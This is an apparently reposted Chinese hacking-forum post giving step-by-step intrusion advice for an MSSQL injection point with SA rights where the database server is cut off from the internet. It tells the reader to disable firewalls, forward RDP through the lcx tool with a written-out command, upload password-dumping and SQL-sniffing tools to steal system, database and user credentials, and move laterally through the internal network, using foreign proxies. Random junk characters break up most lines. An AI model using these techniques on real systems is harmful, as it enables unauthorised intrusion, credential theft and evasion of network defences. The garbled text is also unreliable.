当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。5 m$ `1 [; r' ~& a
" }) [! O1 a/ H
; u0 @. h3 v q7 T5 K& A8 r6 J4 |5 N3 F7 \
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
* S' U, U: [2 h8 I2 m3 h0 V. [
7 S, E, M0 K# P, j5 g0 Y
7 n' l, N$ f2 K9 f- R) z一、DB机有公网IP.
2 }/ Q7 y2 k% n& @ |! j/ c3 J) f) c7 V/ y6 N
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.$ b }8 n/ ^9 X; T; B4 x
, E; M7 ? N- @! M. N+ X
& B: |6 V1 N- ?& R5 _3 s: K% y
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
r& u) J; k$ F$ X( H
" L, \& F: ~+ T- \
: g8 s5 n% u, d, D8 ?( i3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
4 s- } f& t" B& T. _* E8 @! ~/ G" g) ~! z# e) d! N* [+ N: k+ o
( a; q; j# c$ S; ^$ b: b; _
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.& O1 q, ? g' V& W0 a- O
, z1 A0 y* [" p8 _; v2 s
5 A9 |) }' d" |% L5 @! g7 ~( h& r4 O
& Z3 ~6 d8 G9 D; `0 H9 n9 }1 \6 ?二、DB机只有内网IP
2 V9 T. M0 T. D3 _- ]* V! j" h5 c: Z S
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. ]; ~! g5 v |$ y+ C
% h$ z3 n7 O9 x/ ]
& @5 S% r* {0 E% i; x' o2:停掉防火墙和IP策略再从内往外扫描.1 n" |* L6 c5 P8 N4 P
" n' E: f c0 O$ M& G/ h! d* w8 ~
( q$ I X; U3 d& t6 E# ~3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
- U/ G0 C, y2 O% b( R |. {9 D) E. d6 C: `' j- d; ^' p8 s; l- U# l
* r$ Z% E2 r! p! l' Q' ^4 I2 f5 L4:学会密码规律分析往往会有惊喜.( p8 y3 K; @" Q' M" \. D" e4 x
1 o' h9 S' T. P6 z9 ?! K
: p, q) m/ c7 X* L
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等/ X4 l2 U: r/ j8 j
* Z" B- O) ^5 \, i, c% O1 |- Z
/ c1 i0 `4 t+ K0 S0 _) @有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |